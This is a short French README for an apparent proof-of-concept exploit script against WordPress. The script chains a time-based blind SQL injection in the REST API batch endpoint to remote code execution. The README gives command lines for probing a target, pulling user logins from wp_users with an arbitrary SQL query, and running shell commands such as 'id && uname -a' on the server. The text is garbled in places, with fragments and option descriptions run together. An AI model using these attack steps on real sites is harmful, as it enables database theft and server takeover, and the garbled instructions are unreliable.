
CVE-2026-63030 & CVE-2026-60137 Wp2shell Poc
poc_wp_tot.py est une preuve de concept (PoC) pour exploiter une vulnérabilité d'injection SQL aveugle basée sur le temps dans le point de terminaison batch de l'API REST WordPress, et enchaîner une escalade jusqu'à l'exécution de code à distance (RCE).
poc_wp_tot.py dans votre répertoire de travail.python3 -m venv venv
source venv/bin/activate

Le script propose trois modes de fonctionnement : probe (détection), extract (récupération de données) et rce (exécution de commandes). Voici des exemples d'utilisation.
python3 poc_wp_tot.py https://target.example.com/
python3 poc_wp_tot.py -v https://target.example.com/ "SELECT user_login FROM wp_users LIMIT 1"
python3 poc_wp_tot.py https://target.example.com/ -c "id && uname -a"
-h, --help : Afficher le message d'aide-v, --verbose: Activer la sortie verbeuse (débogage)-c <COMMAND> : Mode RCE — exécuter une commande shell sur la cibleSLEEP() sur le serveur cible comme condition booléenne (SQLi aveugle temporelle).poc_wp_tot.py.calibrate(), get_scalar() et exploit_rce() dans le script.